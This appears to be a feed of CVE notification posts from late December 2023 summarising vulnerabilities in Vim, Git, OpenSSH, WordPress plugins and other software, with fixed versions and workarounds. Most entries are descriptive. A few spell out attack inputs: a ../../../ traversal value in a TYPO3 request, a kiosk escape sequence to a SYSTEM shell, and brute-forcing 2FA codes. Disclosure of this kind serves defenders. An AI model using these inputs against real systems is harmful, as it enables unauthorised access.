🚨 CVE-2023-48235Vim is an open source command line text editor. When parsing relative ex addresses one may unintentionally cause anoverflow. Ironically this happens in the existing overflow check, because the line number becomes negative and LONG_MAX - lnum will cause the overflow. Impact is low, user interaction is required and a crash may not even happen in all situations. This issue has been addressed in commit `060623e` which has been included in release version 9.0.2110. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-27 15:24:39 |
🚨 CVE-2023-48232Vim is an open source command line text editor. A floating point exception may occur when calculating the line offset for overlong lines and smooth scrolling is enabled and the cpo-settings include the 'n' flag. This may happen when a window border is present and when the wrapped line continues on the next physical line directly in the window border because the 'cpo' setting includes the 'n' flag. Only users with non-default settings are affected and the exception should only result in a crash. This issue has been addressed in commit `cb0b99f0` which has been included in release version 9.0.2107. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-27 15:24:38 |
🚨 CVE-2023-48231Vim is an open source command line text editor. When closing a window, vim may try to access already freed window structure. Exploitation beyond crashing the application has not been shown to be viable. This issue has been addressed in commit `25aabc2b` which has been included in release version 9.0.2106. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-27 15:24:34 |
🚨 CVE-2019-10158A flaw was found in Infinispan through version 9.4.14.Final. An improper implementation of the session fixation protection in the Spring Session integration can result in incorrect session handling.🎖@cveNotify |
|
| 2023-12-27 15:24:33 |
🚨 CVE-2018-8088org.slf4j.ext.EventData in the slf4j-ext module in QOS.CH SLF4J before 1.8.0-beta2 allows remote attackers to bypass intended access restrictions via crafted data. EventData in the slf4j-ext module in QOS.CH SLF4J, has been fixed in SLF4J versions 1.7.26 later and in the 2.0.x series.🎖@cveNotify |
|
| 2023-12-27 15:24:32 |
🚨 CVE-2015-1197cpio 2.11, when using the --no-absolute-filenames option, allows local users to write to arbitrary files via a symlink attack on a file in an archive.🎖@cveNotify |
|
| 2023-12-27 14:54:32 |
🚨 CVE-2023-49821Cross-Site Request Forgery (CSRF) vulnerability in LiveChat LiveChat – WP live chat plugin for WordPress.This issue affects LiveChat – WP live chat plugin for WordPress: from n/a through 4.5.15.🎖@cveNotify |
|
| 2023-12-27 10:24:45 |
🚨 CVE-2023-29007Git is a revision control system. Prior to versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1, a specially crafted `.gitmodules` file with submodule URLs that are longer than 1024 characters can used to exploit a bug in `config.c::git_config_copy_or_rename_section_in_file()`. This bug can be used to inject arbitrary configuration into a user's `$GIT_DIR/config` when attempting to remove the configuration section associated with that submodule. When the attacker injects configuration values which specify executables to run (such as `core.pager`, `core.editor`, `core.sshCommand`, etc.) this can lead to a remote code execution. A fix A fix is available in versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1. As a workaround, avoid running `git submodule deinit` on untrusted repositories or without prior inspection of any submodule sections in `$GIT_DIR/config`.🎖@cveNotify |
|
| 2023-12-27 10:24:39 |
🚨 CVE-2023-25815In Git for Windows, the Windows port of Git, no localized messages are shipped with the installer. As a consequence, Git is expected not to localize messages at all, and skips the gettext initialization. However, due to a change in MINGW-packages, the `gettext()` function's implicit initialization no longer uses the runtime prefix but uses the hard-coded path `C:\mingw64\share\locale` to look for localized messages. And since any authenticated user has the permission to create folders in `C:\` (and since `C:\mingw64` does not typically exist), it is possible for low-privilege users to place fake messages in that location where `git.exe` will pick them up in version 2.40.1.This vulnerability is relatively hard to exploit and requires social engineering. For example, a legitimate message at the end of a clone could be maliciously modified to ask the user to direct their web browser to a malicious website, and the user might think that the message comes from Git and is legitimate. It does require local write access by the attacker, though, which makes this attack vector less likely. Version 2.40.1 contains a patch for this issue. Some workarounds are available. Do not work on a Windows machine with shared accounts, or alternatively create a `C:\mingw64` folder and leave it empty. Users who have administrative rights may remove the permission to create folders in `C:\`.🎖@cveNotify |
|
| 2023-12-27 10:24:38 |
🚨 CVE-2023-22490Git is a revision control system. Using a specially-crafted repository, Git prior to versions 2.39.2, 2.38.4, 2.37.6, 2.36.5, 2.35.7, 2.34.7, 2.33.7, 2.32.6, 2.31.7, and 2.30.8 can be tricked into using its local clone optimization even when using a non-local transport. Though Git will abort local clones whose source `$GIT_DIR/objects` directory contains symbolic links, the `objects` directory itself may still be a symbolic link. These two may be combined to include arbitrary files based on known paths on the victim's filesystem within the malicious repository's working copy, allowing for data exfiltration in a similar manner as CVE-2022-39253.A fix has been prepared and will appear in v2.39.2 v2.38.4 v2.37.6 v2.36.5 v2.35.7 v2.34.7 v2.33.7 v2.32.6, v2.31.7 and v2.30.8. If upgrading is impractical, two short-term workarounds are available. Avoid cloning repositories from untrusted sources with `--recurse-submodules`. Instead, consider cloning repositories without recursively cloning their submodules, and instead run `git submodule update` at each layer. Before doing so, inspect each new `.gitmodules` file to ensure that it does not contain suspicious module URLs.🎖@cveNotify |
|
| 2023-12-27 10:24:37 |
🚨 CVE-2022-41903Git is distributed revision control system. `git log` can display commits in an arbitrary format using its `--format` specifiers. This functionality is also exposed to `git archive` via the `export-subst` gitattribute. When processing the padding operators, there is a integer overflow in `pretty.c::format_and_pad_commit()` where a `size_t` is stored improperly as an `int`, and then added as an offset to a `memcpy()`. This overflow can be triggered directly by a user running a command which invokes the commit formatting machinery (e.g., `git log --format=...`). It may also be triggered indirectly through git archive via the export-subst mechanism, which expands format specifiers inside of files within the repository during a git archive. This integer overflow can result in arbitrary heap writes, which may result in arbitrary code execution. The problem has been patched in the versions published on 2023-01-17, going back to v2.30.7. Users are advised to upgrade. Users who are unable to upgrade should disable `git archive` in untrusted repositories. If you expose git archive via `git daemon`, disable it by running `git config --global daemon.uploadArch false`.🎖@cveNotify |
|
| 2023-12-27 10:24:33 |
🚨 CVE-2022-39260Git is an open source, scalable, distributed revision control system. `git shell` is a restricted login shell that can be used to implement Git's push/pull functionality via SSH. In versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4, the function that splits the command arguments into an array improperly uses an `int` to represent the number of entries in the array, allowing a malicious actor to intentionally overflow the return value, leading to arbitrary heap writes. Because the resulting array is then passed to `execv()`, it is possible to leverage this attack to gain remote code execution on a victim machine. Note that a victim must first allow access to `git shell` as a login shell in order to be vulnerable to this attack. This problem is patched in versions 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 and users are advised to upgrade to the latest version. Disabling `git shell` access via remote logins is a viable short-term workaround.🎖@cveNotify |
|
| 2023-12-27 10:24:32 |
🚨 CVE-2022-24765Git for Windows is a fork of Git containing Windows-specific patches. This vulnerability affects users working on multi-user machines, where untrusted parties have write access to the same hard disk. Those untrusted parties could create the folder `C:\.git`, which would be picked up by Git operations run supposedly outside a repository while searching for a Git directory. Git would then respect any config in said Git directory. Git Bash users who set `GIT_PS1_SHOWDIRTYSTATE` are vulnerable as well. Users who installed posh-gitare vulnerable simply by starting a PowerShell. Users of IDEs such as Visual Studio are vulnerable: simply creating a new project would already read and respect the config specified in `C:\.git\config`. Users of the Microsoft fork of Git are vulnerable simply by starting a Git Bash. The problem has been patched in Git for Windows v2.35.2. Users unable to upgrade may create the folder `.git` on all drives where Git commands are run, and remove read/write access from those folders as a workaround. Alternatively, define or extend `GIT_CEILING_DIRECTORIES` to cover the _parent_ directory of the user profile, e.g. `C:\Users` if the user profile is located in `C:\Users\my-user-name`.🎖@cveNotify |
|
| 2023-12-27 04:24:32 |
🚨 CVE-2023-48107Buffer Overflow vulnerability in zlib-ng minizip-ng v.4.0.2 allows an attacker to execute arbitrary code via a crafted file to the mz_path_has_slash function in the mz_os.c file.🎖@cveNotify |
|
| 2023-12-27 02:24:32 |
🚨 CVE-2023-27043The email module of Python through 3.11.3 incorrectly parses e-mail addresses that contain a special character. The wrong portion of an RFC2822 header is identified as the value of the addr-spec. In some applications, an attacker can bypass a protection mechanism in which application access is granted only after verifying receipt of e-mail to a specific domain (e.g., only @company.example.com addresses may be used for signup). This occurs in email/_parseaddr.py in recent versions of Python.🎖@cveNotify |
|
| 2023-12-26 23:24:32 |
🚨 CVE-2023-52096SteVe Community ocpp-jaxb before 0.0.8 generates invalid timestamps such as ones with month 00 in certain situations (such as when an application receives a StartTransaction Open Charge Point Protocol message with a timestamp parameter of 1000000). This may lead to a SQL exception in applications, and may undermine the integrity of transaction records.🎖@cveNotify |
|
| 2023-12-26 21:54:45 |
🚨 CVE-2023-49270Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'check_in_date' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response.🎖@cveNotify |
|
| 2023-12-26 21:54:38 |
🚨 CVE-2023-5011Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'coursename' parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-26 21:54:37 |
🚨 CVE-2023-5010Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'coursecode' parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-26 21:54:33 |
🚨 CVE-2023-49825Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PenciDesign Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme.This issue affects Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1.🎖@cveNotify |
|
| 2023-12-26 21:54:32 |
🚨 CVE-2023-51462Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-12-26 21:24:32 |
🚨 CVE-2023-51461Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2023-12-26 20:54:40 |
🚨 CVE-2023-30451In TYPO3 11.5.24, the filelist component allows attackers (who have access to the administrator panel) to read arbitrary files via directory traversal in the baseuri field, as demonstrated by POST /typo3/record/edit with ../../../ in data[sys_file_storage]*[data][sDEF][lDEF][basePath][vDEF].🎖@cveNotify |
|
| 2023-12-26 20:54:33 |
🚨 CVE-2023-43064Facsimile Support for IBM i 7.2, 7.3, 7.4, and 7.5 could allow a local user to gain elevated privileges due to an unqualified library call. A malicious actor could cause arbitrary code to run with the privilege of the user invoking the facsimile support. IBM X-Force ID: 267689.🎖@cveNotify |
|
| 2023-12-26 20:54:32 |
🚨 CVE-2021-38927IBM Aspera Console 3.4.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 210322.🎖@cveNotify |
|
| 2023-12-26 20:24:40 |
🚨 CVE-2022-3458A vulnerability has been found in SourceCodester Human Resource Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /employeeview.php of the component Image File Handler. The manipulation leads to unrestricted upload. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-210559.🎖@cveNotify |
|
| 2023-12-26 20:24:33 |
🚨 CVE-2016-10891The aryo-activity-log plugin before 2.3.3 for WordPress has XSS.🎖@cveNotify |
|
| 2023-12-26 20:24:32 |
🚨 CVE-2018-8729Multiple cross-site scripting (XSS) vulnerabilities in the Activity Log plugin before 2.4.1 for WordPress allow remote attackers to inject arbitrary JavaScript or HTML via a title that is not escaped.🎖@cveNotify |
|
| 2023-12-26 19:24:44 |
🚨 CVE-2023-6250The BestWebSoft's Like & Share WordPress plugin before 2.74 discloses the content of password protected posts to unauthenticated users via a meta tag🎖@cveNotify |
|
| 2023-12-26 19:24:43 |
🚨 CVE-2023-6114The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site.🎖@cveNotify |
|
| 2023-12-26 19:24:38 |
🚨 CVE-2023-5980The BSK Forms Blacklist WordPress plugin before 3.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-12-26 19:24:37 |
🚨 CVE-2023-5674The WP Mail Log WordPress plugin before 1.1.3 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor.🎖@cveNotify |
|
| 2023-12-26 19:24:33 |
🚨 CVE-2023-5645The WP Mail Log WordPress plugin before 1.1.3 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor.🎖@cveNotify |
|
| 2023-12-26 19:24:32 |
🚨 CVE-2023-5203The WP Sessions Time Monitoring Full Automatic WordPress plugin before 1.0.9 does not sanitize the request URL or query parameters before using them in an SQL query, allowing unauthenticated attackers to extract sensitive data from the database via blind time based SQL injection techniques, or in some cases an error/union based technique.🎖@cveNotify |
|
| 2023-12-26 17:24:33 |
🚨 CVE-2023-51095Tenda M3 V1.0.0.12(4856) was discovered to contain a stack overflow via the function formDelWlRfPolicy.🎖@cveNotify |
|
| 2023-12-26 17:24:32 |
🚨 CVE-2012-6527Cross-site scripting (XSS) vulnerability in the My Calendar plugin before 1.10.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.🎖@cveNotify |
|
| 2023-12-26 15:24:39 |
🚨 CVE-2023-51106A floating point exception (divide-by-zero) vulnerability was discovered in mupdf 1.23.4 in functon pnm_binary_read_image() of load-pnm.c.🎖@cveNotify |
|
| 2023-12-26 15:24:38 |
🚨 CVE-2023-51105A floating point exception (divide-by-zero) vulnerability was discovered in mupdf 1.23.4 in function bmp_decompress_rle4() of load-bmp.c.🎖@cveNotify |
|
| 2023-12-26 15:24:34 |
🚨 CVE-2023-51104A floating point exception (divide-by-zero) vulnerability was discovered in mupdf 1.23.4 in functon pnm_binary_read_image() of load-pnm.c line 527.🎖@cveNotify |
|
| 2023-12-26 15:24:33 |
🚨 CVE-2014-125109A vulnerability was found in BestWebSoft Portfolio Plugin up to 2.27. It has been declared as problematic. This vulnerability affects the function bws_add_menu_render of the file bws_menu/bws_menu.php. The manipulation of the argument bwsmn_form_email leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 2.28 is able to address this issue. The name of the patch is d2ede580474665af56ff262a05783fbabe4529b8. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248956.🎖@cveNotify |
|
| 2023-12-26 15:24:32 |
🚨 CVE-2023-49298OpenZFS through 2.1.13 and 2.2.x through 2.2.1, in certain scenarios involving applications that try to rely on efficient copying of file data, can replace file contents with zero-valued bytes and thus potentially disable security mechanisms. NOTE: this issue is not always security related, but can be security related in realistic situations. A possible example is cp, from a recent GNU Core Utilities (coreutils) version, when attempting to preserve a rule set for denying unauthorized access. (One might use cp when configuring access control, such as with the /etc/hosts.deny file specified in the IBM Support reference.) NOTE: this issue occurs less often in version 2.2.1, and in versions before 2.1.4, because of the default configuration in those versions.🎖@cveNotify |
|
| 2023-12-26 14:24:32 |
🚨 CVE-2023-49949Passwork before 6.2.0 allows remote authenticated users to bypass 2FA by sending all one million of the possible 6-digit codes.🎖@cveNotify |
|
| 2023-12-26 12:24:32 |
🚨 CVE-2023-50968Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations.The same uri can be operated to realize a SSRF attack also without authorizations.Users are recommended to upgrade to version 18.12.11, which fixes this issue.🎖@cveNotify |
|
| 2023-12-26 10:24:32 |
🚨 CVE-2012-10017A vulnerability was found in BestWebSoft Portfolio Plugin up to 2.04 on WordPress. It has been classified as problematic. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 2.06 is able to address this issue. The patch is named 68af950330c3202a706f0ae9bbb52ceaa17dda9d. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248955.🎖@cveNotify |
|
| 2023-12-26 09:24:32 |
🚨 CVE-2023-5180An issue was discovered in Open Design AllianceDrawings SDK before 2024.12. A corrupted value of numberof sectors used by the Fat structure in a crafted DGN file leads to anout-of-bounds write. An attacker can leverage this vulnerability to executecode in the context of the current process.🎖@cveNotify |
|
| 2023-12-26 08:24:45 |
🚨 CVE-2023-49779Stored cross-site scripting vulnerability exists in the anchor tag of GROWI versions prior to v6.0.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product.🎖@cveNotify |
|
| 2023-12-26 08:24:39 |
🚨 CVE-2023-49598Stored cross-site scripting vulnerability exists in the event handlers of the pre tags in GROWI versions prior to v6.0.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product.🎖@cveNotify |
|
| 2023-12-26 08:24:38 |
🚨 CVE-2023-46711VR-S1000 firmware Ver. 2.37 and earlier uses a hard-coded cryptographic key which may allow an attacker to analyze the password of a specific product user.🎖@cveNotify |
|
| 2023-12-26 08:24:37 |
🚨 CVE-2023-46699Cross-site request forgery (CSRF) vulnerability exists in the User settings (/me) page of GROWI versions prior to v6.0.0. If a user views a malicious page while logging in, settings may be changed without the user's intention.🎖@cveNotify |
|
| 2023-12-26 08:24:33 |
🚨 CVE-2023-45741VR-S1000 firmware Ver. 2.37 and earlier allows an attacker with access to the product's web management page to execute arbitrary OS commands.🎖@cveNotify |
|
| 2023-12-26 08:24:32 |
🚨 CVE-2023-42436Stored cross-site scripting vulnerability exists in the presentation feature of GROWI versions prior to v3.4.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product.🎖@cveNotify |
|
| 2023-12-26 06:24:33 |
🚨 CVE-2023-51654Improper link resolution before file access ('Link Following') issue exists in iPrint&Scan Desktop for Windows versions 11.0.0 and earlier. A symlink attack by a malicious user may cause a Denial-of-service (DoS) condition on the PC.🎖@cveNotify |
|
| 2023-12-26 06:24:32 |
🚨 CVE-2023-49117PowerCMS (6 Series, 5 Series, and 4 Series) contains a stored cross-site scripting vulnerability. If this vulnerability is exploited, an arbitrary script may be executed on a logged-in user's web browser. Note that all versions of PowerCMS 3 Series and earlier which are unsupported (End-of-Life, EOL) are also affected by this vulnerability.🎖@cveNotify |
|
| 2023-12-26 04:24:33 |
🚨 CVE-2023-51385In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name.🎖@cveNotify |
|
| 2023-12-26 04:24:32 |
🚨 CVE-2021-41617sshd in OpenSSH 6.2 through 8.x before 8.8, when certain non-default configurations are used, allows privilege escalation because supplemental groups are not initialized as expected. Helper programs for AuthorizedKeysCommand and AuthorizedPrincipalsCommand may run with privileges associated with group memberships of the sshd process, if the configuration specifies running the command as a different user.🎖@cveNotify |
|
| 2023-12-26 03:24:32 |
🚨 CVE-2023-27043The email module of Python through 3.11.3 incorrectly parses e-mail addresses that contain a special character. The wrong portion of an RFC2822 header is identified as the value of the addr-spec. In some applications, an attacker can bypass a protection mechanism in which application access is granted only after verifying receipt of e-mail to a specific domain (e.g., only @company.example.com addresses may be used for signup). This occurs in email/_parseaddr.py in recent versions of Python.🎖@cveNotify |
|
| 2023-12-25 09:24:32 |
🚨 CVE-2023-38321OpenNDS, as used in Sierra Wireless ALEOS before 4.17.0.12 and other products, allows remote attackers to cause a denial of service (NULL pointer dereference, daemon crash, and Captive Portal outage) via a GET request to /opennds_auth/ that lacks a custom query string parameter and client-token.🎖@cveNotify |
|
| 2023-12-25 08:24:44 |
🚨 CVE-2023-49954The CRM Integration in 3CX before 18.0.9.23 and 20 before 20.0.0.1494 allows SQL Injection via a first name, search string, or email address.🎖@cveNotify |
|
| 2023-12-25 08:24:39 |
🚨 CVE-2023-49226An issue was discovered in Peplink Balance Two before 8.4.0. Command injection in the traceroute feature of the administration console allows users with admin privileges to execute arbitrary commands as root.🎖@cveNotify |
|
| 2023-12-25 08:24:38 |
🚨 CVE-2023-36486The workflow-engine of ILIAS before 7.23 and 8 before 8.3 allows remote authenticated users to run arbitrary system commands on the application server as the application user by uploading a workflow definition file with a malicious filename.🎖@cveNotify |
|
| 2023-12-25 08:24:33 |
🚨 CVE-2022-34268An issue was discovered in RWS WorldServer before 11.7.3. /clientLogin deserializes Java objects without authentication, leading to command execution on the host.🎖@cveNotify |
|
| 2023-12-25 08:24:32 |
🚨 CVE-2023-7100A vulnerability, which was classified as critical, was found in PHPGurukul Restaurant Table Booking System 1.0. Affected is an unknown function of the file /admin/bwdates-report-details.php. The manipulation of the argument fdate leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248952.🎖@cveNotify |
|
| 2023-12-25 07:24:38 |
🚨 CVE-2023-47091An issue was discovered in Stormshield Network Security (SNS) SNS 4.3.13 through 4.3.22 before 4.3.23, SNS 4.6.0 through 4.6.9 before 4.6.10, and SNS 4.7.0 through 4.7.1 before 4.7.2. An attacker can overflow the cookie threshold, making an IPsec connection impossible.🎖@cveNotify |
|
| 2023-12-25 07:24:37 |
🚨 CVE-2023-37188C-blosc2 before 2.9.3 was discovered to contain a NULL pointer dereference via the function zfp_rate_decompress at zfp/blosc2-zfp.c.🎖@cveNotify |
|
| 2023-12-25 07:24:33 |
🚨 CVE-2023-37186C-blosc2 before 2.9.3 was discovered to contain a NULL pointer dereference in ndlz/ndlz8x8.c via a NULL pointer to memset.🎖@cveNotify |
|
| 2023-12-25 07:24:32 |
🚨 CVE-2023-28872Support Assistant in NCP Secure Enterprise Client before 13.10 allows attackers to execute DLL files with SYSTEM privileges by creating a symbolic link from a %LOCALAPPDATA%\Temp\NcpSupport* location.🎖@cveNotify |
|
| 2023-12-25 06:24:44 |
🚨 CVE-2023-48654One Identity Password Manager before 5.13.1 allows Kiosk Escape. This product enables users to reset their Active Directory passwords on the login screen of a Windows client. It launches a Chromium based browser in Kiosk mode to provide the reset functionality. The escape sequence is: go to the Google ReCAPTCHA section, click on the Privacy link, observe that there is a new browser window, navigate to any website that offers file upload, navigate to cmd.exe from the file explorer window, and launch cmd.exe as NT AUTHORITY\SYSTEM.🎖@cveNotify |
|
| 2023-12-25 06:24:43 |
🚨 CVE-2023-40236In Pexip VMR self-service portal before 3, the same SSH host key is used across different customers' installations, which allows authentication bypass.🎖@cveNotify |
|
| 2023-12-25 06:24:39 |
🚨 CVE-2023-31455Pexip Infinity before 31.2 has Improper Input Validation for RTCP, allowing remote attackers to trigger an abort.🎖@cveNotify |
|
| 2023-12-25 06:24:38 |
🚨 CVE-2022-41762An issue was discovered in NOKIA NFM-T R19.9. Multiple Reflected XSS vulnerabilities exist in the Network Element Manager via any parameter to log.pl, the bench or pid parameter to top.pl, or the id parameter to easy1350.pl.🎖@cveNotify |
|
| 2023-12-25 06:24:33 |
🚨 CVE-2022-39822In NOKIA NFM-T R19.9, a SQL Injection vulnerability occurs in /cgi-bin/R19.9/easy1350.pl of the VM Manager WebUI via the id or host HTTP GET parameter. An authenticated attacker is required for exploitation.🎖@cveNotify |
|
| 2023-12-25 06:24:32 |
🚨 CVE-2022-39818In NOKIA NFM-T R19.9, an OS Command Injection vulnerability occurs in /cgi-bin/R19.9/log.pl of the VM Manager WebUI via the cmd HTTP GET parameter. This allows authenticated users to execute commands, with root privileges, on the operating system.🎖@cveNotify |
|
| 2023-12-25 05:24:32 |
🚨 CVE-2023-30451In TYPO3 11.5.24, the filelist component allows attackers (who have access to the administrator panel) to read arbitrary files via directory traversal in the baseuri field, as demonstrated by POST /typo3/record/edit with ../../../ in data[sys_file_storage]*[data][sDEF][lDEF][basePath][vDEF].🎖@cveNotify |
|
| 2023-12-25 04:24:32 |
🚨 CVE-2023-6377A flaw was found in xorg-server. Querying or changing XKB button actions such as moving from a touchpad to a mouse can result in out-of-bounds memory reads and writes. This may allow local privilege escalation or possible remote code execution in cases where X11 forwarding is involved.🎖@cveNotify |
|
| 2023-12-25 02:24:32 |
🚨 CVE-2023-7097A vulnerability classified as critical has been found in code-projects Water Billing System 1.0. This affects an unknown part of the file /addbill.php. The manipulation of the argument owners_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248949 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-25 01:24:32 |
🚨 CVE-2023-7095A vulnerability, which was classified as critical, has been found in Totolink A7100RU 7.4cu.2313_B20191024. Affected by this issue is the function main of the file /cgi-bin/cstecgi.cgi?action=login of the component HTTP POST Request Handler. The manipulation of the argument flag leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248942 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-25 00:24:32 |
🚨 CVE-2023-7093A vulnerability classified as critical has been found in KylinSoft kylin-system-updater up to 2.0.5.16-0k2.33. Affected is an unknown function of the file /usr/share/kylin-system-updater/SystemUpdater/UpgradeStrategiesDbus.py of the component com.kylin.systemupgrade Service. The manipulation of the argument SetDownloadspeedMax leads to os command injection. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248940. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-24 23:24:32 |
🚨 CVE-2023-7092A vulnerability was found in Uniway UW-302VP 2.0. It has been rated as problematic. This issue affects some unknown processing of the file /boaform/wlan_basic_set.cgi of the component Admin Web Interface. The manipulation of the argument wlanssid/password leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248939. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-24 22:24:32 |
🚨 CVE-2023-7101Spreadsheet::ParseExcel version 0.65 is a Perl module used for parsing Excel files. Spreadsheet::ParseExcel is vulnerable to an arbitrary code execution (ACE) vulnerability due to passing unvalidated input from a file into a string-type “eval”. Specifically, the issue stems from the evaluation of Number format strings (not to be confused with printf-style format strings) within the Excel parsing logic.🎖@cveNotify |
|
| 2023-12-24 21:24:32 |
🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.🎖@cveNotify |
|
| 2023-12-24 18:24:32 |
🚨 CVE-2021-36367PuTTY through 0.75 proceeds with establishing an SSH session even if it has never sent a substantive authentication response. This makes it easier for an attacker-controlled SSH server to present a later spoofed authentication prompt (that the attacker can use to capture credential data, and use that data for purposes that are undesired by the client user).🎖@cveNotify |
|
| 2023-12-24 17:24:32 |
